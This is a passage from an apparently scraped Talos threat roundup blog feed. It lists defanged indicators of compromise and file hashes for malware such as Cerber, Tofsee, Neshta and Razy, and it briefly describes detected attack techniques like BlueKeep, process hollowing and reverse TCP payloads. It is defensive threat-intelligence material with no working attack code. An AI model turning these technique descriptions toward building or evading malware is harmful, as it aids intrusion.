d1c761853ebdfd063cbe19d1a6f5ca1823bef0f6c527064846e20f1c8df8c54e d913691cdc1b1140905af020364afbc3144989b7a7947332efb29ef95440597d de8ff7107c7566fa9d68c49f0808c2c47df83fabeaa99b70a2f30da9f6d4c1a1 deee1f14fe06f8ceac4f617cba37d027664b9bc171cf0f1a3fca9c78da4df525 e5210cb809f2f6c04d51994491cf29edcaadc338df7294051406e5dd6b0d2d8e eb5ac18bb9bbce53b7522955ee36eccc8d21c5347c54b3830c5085cb323b6838 f9f839ec0ee45b5bc8b2dc65ed2747c662de954d7b14d8d00cb1fc47878f513a fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-cga40gFxnJE/XbMXy6OCXXI/AAAAAAAAC2w/zrc9qRiZE8crzaw2RQaKiCatrumDLC63gCLcBGAsYHQ/s1600/3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mLutp8aaYd4/XbMX4-OUsWI/AAAAAAAAC20/qVuiRUpiUfsEbNjGQUsrDjZo_TzAvSMCACLcBGAsYHQ/s1600/fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7343756-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 25 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 26 \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]33[.]158[.]0/27` | 26 \n`178[.]33[.]159[.]0/27` | 26 \n`178[.]33[.]160[.]0/25` | 26 \n`178[.]128[.]255[.]179` | 17 \n`150[.]109[.]231[.]116` | 15 \n`54[.]164[.]0[.]55` | 13 \n`34[.]206[.]50[.]228` | 12 \n`104[.]24[.]111[.]135` | 11 \n`104[.]24[.]110[.]135` | 6 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 25 \n`bitaps[.]com` | 17 \n`chain[.]so` | 17 \n`btc[.]blockr[.]io` | 17 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 9 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 28 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 28 \n`\\I386\\COMPDATA\\EPSON3.TXT` | 26 \n`%TEMP%\\8f793a96\\4751.tmp` | 26 \n`%TEMP%\\8f793a96\\da80.tmp` | 26 \n`\\I386\\COMPDATA\\BOSERROR.TXT` | 26 \n`\\I386\\RUNW32.BAT` | 26 \n`%TEMP%\\tmp1.bmp` | 26 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 26 \n`%TEMP%\\d19ab989\\4710.tmp` | 25 \n`%TEMP%\\d19ab989\\a35f.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 25 \n \n#### File Hashes\n\n` 0571ddf62e8bcf0dfc91f61079145ef5a334ade39ffd45d7ce88b4cbe42a15d3 09606b24a726b8179417a36c9aca18f44ebcf98f2240fbb398b70c49090d050b 162012945f91033f3683b742d660795cc2e184f41d6db3a15703e38024ce7985 1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb 1f86d067251a326322db9afea633b6ef9419eb456eded355220fe590ea2f11c5 283bd9ce2b81146780f060c00fdb7e11701cb617a55b5b6e15217b8041fb5480 2b75044e81ecbee8f6da594a277e37d7a232e934ef9de81b8185e4c0213564a6 2dbf7bed5adcba2ce1f48736431a2041ec2c6a581a6edc4c0883f6394022316c 34012082527c5206f58fe4dc7ed65aa785864ffc57b69ef36a2684a0bd77df93 37ae3f37a90f62a3247ac2b2afaa2a7b7feca603fd9258a23be3b0c06fad3baf 394e282ad6f08c49e67258afb5be535d98ca35b2bffdfd4cc6f866ff909da21c 41dfd05edf2657153e9f265e5f41877660b0fe9b3d4c46d82a0560234fe7d911 54be4270379a47819af99f6b455af363531d0c035f6f645b0505240cbe2e18df 58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9 5cde373946029302a628504ae7fe6c26037ba6c6e7cf575aa33258808dc7b4d3 5e3b677a238a772109ab8282964d0a7dc4a68e422471589eeb58dacf4f3b1917 5f5c89d4cae98e32d764146b5ea87879ed6c355171535e1ca1b65f8a5d2fc296 69747e554bef6e4fec803333c19df48b7317848feb58842849fdb3797d41f66c 6d1ed5c4c21f2f9fa42d1cede8411ae9347ae85c03a76dd212856187c66328b3 797adc29fe0dddbfb03aec9344dd2f93a702bb57920f35bd7decb92873b2ea86 79acc4d7034c595c35d2280281699064e114bc6ca7dcc461c2077a2d350f78c4 821923194cc976d5b0785d114769c85b473e7e7316f0bfab3e60f94404bd9a91 8232399d1c7350132d3347c6aeffcea06c38e6c8fbf3527399a51d7fc3bff1bb 831872753224405c5553a509d3ac4af91032d789cba67977e43e1b0b68abe543 91f928319c927531fb3c2863eefd2fff358a962887d8fd8deeeead74d3602562 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-asipuCkmusQ/XbMYIJ0AudI/AAAAAAAAC3A/hZAqgmyXDF8CK4RONMldSt1xzAoKJqOuACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-nhBt9C3hzsU/XbMYO4h6WNI/AAAAAAAAC3I/ougbZS8J9D4tq1A9zZ8njBjlwbCnR3CPQCLcBGAsYHQ/s1600/58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-djWpLHBjSCk/XbMYVgGnNnI/AAAAAAAAC3M/Wyc-yHP_HOU_X12Y3Aubqupp6jChnKNcACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (69038) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (2294) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nProcess hollowing detected \\- (321) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (304) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nDealply adware detected \\- (226) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (183) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (156) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (88) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (49) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nReverse tcp payload detected \\- (38) \nAn exploit payload intended to connect back to an attacker controlled host using tcp has been detected. \n \n", "cvss3": {}, "published": "2019-10-25T09:33:00", "type": "talosblog", "title": "Threat Roundup for October 18 to October 25", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-10-25T09:33:00", "id": "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nTLDbUoTJvY/threat-roundup-1018-1025.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-23T22:20:46", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 16 and Aug. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d603f5011797.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Tofsee-7131053-0 | Trojan | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Virus.Neshta-7131041-0 | Virus | Neshta is file-infecting malware that also collects sensitive information from an infected machine and sends it to a C2 server. \nWin.Trojan.Razy-7124013-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Malware.Elkern-7118026-1 | Malware | Elkern is a worm that spreads via peer-to-peer networks by masquerading as popular movies, games, or software. Once executed, it installs follow-on malware onto the system. \nWin.Packed.Xcnfe-7131484-0 | Packed | This cluster provides generic detection for the Dridex banking trojan that's downloaded onto a target's machine. \nWin.Worm.Vobfus-7123957-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Tofsee-7131053-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 28 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 28 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 28 \n`REGISTRY\\USER\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 28 \n`REGISTRY\\USER\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 28 \n`REGISTRY\\USER\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 28 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\buionvbq ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\yrflksyn ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dwkqpxds ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\kdrxwekz ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\zsgmltzo ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 28 \n`69[.]55[.]5[.]250` | 28 \n`46[.]4[.]52[.]109` | 28 \n`176[.]111[.]49[.]43` | 28 \n`85[.]25[.]119[.]25` | 28 \n`144[.]76[.]199[.]2` | 28 \n`144[.]76[.]199[.]43` | 28 \n`43[.]231[.]4[.]7` | 28 \n`192[.]0[.]47[.]59` | 28 \n`95[.]181[.]178[.]17` | 28 \n`211[.]231[.]108[.]47` | 25 \n`64[.]233[.]186[.]27` | 25 \n`172[.]217[.]197[.]27` | 25 \n`98[.]136[.]96[.]74` | 25 \n`172[.]217[.]5[.]228` | 24 \n`67[.]195[.]228[.]110` | 23 \n`173[.]194[.]66[.]27` | 23 \n`209[.]85[.]203[.]27` | 23 \n`207[.]69[.]189[.]229` | 22 \n`98[.]137[.]157[.]43` | 22 \n`213[.]205[.]33[.]63` | 22 \n`98[.]136[.]96[.]77` | 22 \n`23[.]160[.]0[.]108` | 21 \n`98[.]136[.]96[.]73` | 21 \n`188[.]125[.]72[.]73` | 21 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 28 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 28 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 28 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 28 \n`whois[.]iana[.]org` | 28 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 28 \n`whois[.]arin[.]net` | 28 \n`eur[.]olc[.]protection[.]outlook[.]com` | 28 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 28 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 28 \n`honeypus[.]rusladies[.]cn` | 28 \n`marina99[.]ruladies[.]cn` | 28 \n`sexual-pattern3[.]com` | 28 \n`coolsex-finders5[.]com` | 28 \n`mta5[.]am0[.]yahoodns[.]net` | 27 \n`smtp[.]secureserver[.]net` | 25 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 25 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 25 \n`mx1[.]emailsrvr[.]com` | 25 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 25 \n`hotmail[.]de` | 24 \n`mx1[.]hanmail[.]net` | 24 \n`hanmail[.]net` | 23 \n`mx6[.]earthlink[.]net` | 22 \n`msx-smtp-mx1[.]hinet[.]net` | 22 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 28 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 28 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 28 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 28 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 5 \n`%TEMP%\\utjfmin.exe` | 1 \n`%TEMP%\\jiyubxc.exe` | 1 \n`%TEMP%\\dcsovrw.exe` | 1 \n`%TEMP%\\rqgcjfk.exe` | 1 \n \n#### File Hashes\n\n` 0009a9ca6636ab37f4c3f21f19741971f5900ae4b18381e7695962a4d4e6f811 013bec317dbcead53cdedaa23feb802e1f2b4e74e016cdff7e39490d22adab30 015ad805d24234339ca8e9f1402c7bcaa1493cefb13f61f3442873fd8f31df97 04d5f2b852d6e9602612ed5b58becccd1eff5e0a8d53671bb3a2209a36ad4a79 059bbb4be73dd7b7055687f9ae779598b2327d61f49b2367ac129685577c8e8b 080b33f9d842b08d082b40f3c49ab9b6727ae47ad154e7c65ee45775d6750693 1348df977c70b9b0ff8cf904c4bd96cbcd58aa332db5c448a63259a1cc7909b2 13e5a8542f77eb807e805cf136d489350d2976af8164c4e9b5daeacdefb4b0f9 16befc710825960d79ccb4f7a2ed12a399e7c4d457e11d141163882e6c6d246e 187746b5d8d8627e46781d34167c08a018ad8a31d2f50033d723d3244c7aad41 1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9 1cf13ba4a00fc7dbb79d2e47c2a56c35518494652989cb1a5e932ec676019bb6 1e3f0775aa3feea8393b3073e34fbb0b00b1306cce374fbef5018d7d79a8f556 269b04eaee60cae3fe4428292be87a81561ea94a4a0df7cab400b15411566415 27681e2fb23e38cfcd21dd751d79ac47a866655ae259131e05566ad1be8611e0 280d20ee6383ebe642253f076e194831c53396f9e7d33567054411cd6b167a50 288084927b8287de4320b026474cfcf01270bc2eb63f40cad82a2a95be4acab0 28b7e0c90f7664f834f7adbee912f1f1efc769132d419b16572cbeeba5c6d724 29100329861dd3e48acc75d9ccb0faaf852e44158538db71ccc569df5e84507e 2996e60bf4ef30b47ddb32ee6ea23603bc266562913be0add727791bd2261234 29f84ea78abaf727817f2d2126ccbec9554ec32550897e28e20dd6ac3f9a038e 2b77064e3de89e494664d588ea3c1fd3f7d3863babbc919769d13187250c395c 2ce0b071b4465e9e383c3ce3df2d100cf5e7cc96a12b25e861e7d88d4be77cdf 2ec24ae1e990a9abadb6d5393089a39c4c570d5f138c3651a66daf336b519598 31fb8cfa6e434122f5a2817d33a2d509f0adc23577771d11ab9ad7682ed7bd41 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-fKM0lB9SX4Q/XWA8RzKYipI/AAAAAAAACX8/deuS24SiVCAD5HhtnKt08L6P6_2sJILOgCLcBGAs/s1600/1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-9GU4IEJuplk/XWA8VxIptGI/AAAAAAAACYA/w_naDcHsEK8F594ImctF20q3jAX0eYSXQCLcBGAs/s1600/1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-g7jQc8ftvCc/XWA8aTZzNoI/AAAAAAAACYE/-7dc38M9rr8mtjFruoZa5fS0EO-auFMCQCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Neshta-7131041-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND ` | 11 \nMutexes | Occurrences \n---|--- \n`MutexPolesskayaGlush*.*\u0090svchost.com\u0090exefile\\shell\\open\\command\u2039\u00c0 \"%1\" %*\u0153\u2018@` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`\\MSOCache\\ALLUSE~1\\{90140~1\\DW20.EXE` | 11 \n`\\MSOCache\\ALLUSE~1\\{90140~1\\dwtrig20.exe` | 11 \n`\\MSOCache\\ALLUSE~1\\{91140~1\\ose.exe` | 11 \n`\\MSOCache\\ALLUSE~1\\{91140~1\\setup.exe` | 11 \n`%TEMP%\\tmp5023.tmp` | 11 \n`%SystemRoot%\\svchost.com` | 11 \n`%HOMEPATH%\\APPLIC~1\\Adobe\\Reader\\9.2\\ARM\\ARMUPD~1\\AdobeARM.exe` | 11 \n`%HOMEPATH%\\APPLIC~1\\Adobe\\Reader\\9.2\\ARM\\ARMUPD~1\\READER~1.EXE` | 11 \n`%HOMEPATH%\\APPLIC~1\\Adobe\\Setup\\{AC76B~1\\Setup.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000050.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000053.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000059.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000060.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000066.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000067.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000070.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000071.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000074.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000073.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000114.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000115.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000116.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000118.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000119.exe` | 11 \n`\\SYSTEM~1\\_RESTO~1\\RP1\\A0000120.exe` | 11 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 23e9f0d6be0f5ba18e787052e64fb7ec62410fab4ec8a3b5f11ec58e34dcf4d7 28996ba8b6dc0794260721cb26bbdc207b23af9352234f5eee0c61851c4a3811 397b969c83ad2e1c6efdb492e932ff8a111f0b1cab34f1409d1888784ad9ca6a 5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e 63e9b564538a88cb7d06e75114ff1e3fc1cf07b973d5c2e74b114361699ba298 793529a8214ced18d6c43239ddc99b60b6cd3ac5055667e4c5878d65c4c24af7 88d1b872c821bd52be9f52677626b319307a316e9218547a66fb9c6597233aa0 9a8af062b9581de41c2fc10673a5760af539f0ad28b94b81bc5bfa4665ea843d ad15b25e0356c98ca1679abcf41d12ab2a3869f0e7aad18d169c72af55bcb502 f988cbba1b43f688839a203e0916e3e11861df7581c4fc770ead93a63f584c44 fd5476414674ca6a58296181ce38fe772ed7c76cd9cfe026b19e194da43787b0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-zI0INKvgxe8/XWA9NcylTrI/AAAAAAAACYY/pgFp43RfvSMTG6C6Ok6BwbObjK1_pK9zgCLcBGAs/s1600/5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-THgo9rm9UVA/XWA9SUQG_6I/AAAAAAAACYc/dZtNM2s5B9wEf_kl2DPaSUQWvaSL8HkbgCLcBGAs/s1600/5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Razy-7124013-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500 ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\SECDESC ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\SID ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\PRIVILGS ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500 ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\SECDESC ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\SID ` | 32 \n`<HKLM>\\SECURITY\\POLICY\\ACCOUNTS\\S-1-5-21-2580483871-590521980-3826313501-500\\PRIVILGS ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINLOGIN_INFO \nValue Name: pool_url ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINLOGIN_INFO \nValue Name: pool_pass ` | 32 